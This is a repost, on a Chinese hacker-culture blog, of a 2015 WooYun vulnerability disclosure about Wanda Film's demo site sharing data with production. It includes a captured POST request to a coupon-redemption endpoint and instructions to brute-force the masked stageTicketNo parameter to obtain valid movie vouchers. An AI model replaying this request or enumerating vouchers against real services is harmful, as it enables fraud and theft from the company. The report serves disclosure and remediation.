记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

万达电影某测试接口与生产未隔离导致可爆破出电影兑换券

2015-05-25 16:55

http://wwwdemo.wandafilm.com 万达测试主站



之前已经提过在(http://wooyun.org/bugs/wooyun-2015-0106596)这个案例提过该测试主站的数据是同步的,故问题归结于测试站点和生产站点未做隔离导致相应的漏洞升级。



问题出现在购票的第三步,可以使用使用影票兑换及优惠处



1.png





此时抓取数据包,对stageTicketNo兑换券参数进行爆破



code 区域
POST http://wwwdemo.wandafilm.com/trade/coupons.do?m=useExachangeStage&sid=0.14484114106744528 HTTP/1.1

Host: wwwdemo.wandafilm.com

Proxy-Connection: keep-alive

Content-Length: 109

Accept: */*

Origin: http://wwwdemo.wandafilm.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://wwwdemo.wandafilm.com/trade/step3.do?m=buyPay&snid=20150409141110216411&spk=20150408112111862006&sid=0.27838509250432253

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Cookie: wandafilm2015-04-09=/wandafilmappHd18651669495/http%3A%2F%2Fwwwdemo.wandafilm.com%2Ftrade%2Fmovie_times.jsp%3FfilmId%3D2015011302182029265318651669495/http%3A%2F%2Fwwwdemo.wandafilm.com%2Ftrade%2Fstep2.do%3Fm%3DmovieBuy%26spk%3D20150408112111862006%26avtId%3D%26price%3D6018651669495/http%3A%2F%2Fwwwdemo.wandafilm.com%2Ftrade%2Fstep3.do%3Fm%3DbuyPay%26snid%3D20150409141110216411%26spk%3D2015040811211186200618651669495; jsessionid|JSESSIONID=******1ba76ad7ef*****; __utma=8139.1428050786.1428050786.1428550560.2; __utmc=81395784; __utmz=81395784.1428050786.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=********92A30CAA0; wandafilm2015-04-09=/wandafilmappHd18651669495; Hm_lvt_12e233684b48dc67054644eaa9e278fc=1428372551,1428456490,1428477542,1428548995; Hm_lpvt_12e233684b48dc67054644eaa9e278fc=1428559876

stageTicketNo=103575197********&orderId=20150409141110216411&orderDetailId=20150409141110220411&seatId=8_16





2.png





通过返回值来判断是否可以使用



3.png





兑换成功



4.png

漏洞证明:

已经证明

修复方案:

隔离测试和生产系统数据

知识来源: www.wooyun.org/bugs/wooyun-2015-0106823

阅读:113454 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“万达电影某测试接口与生产未隔离导致可爆破出电影兑换券”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词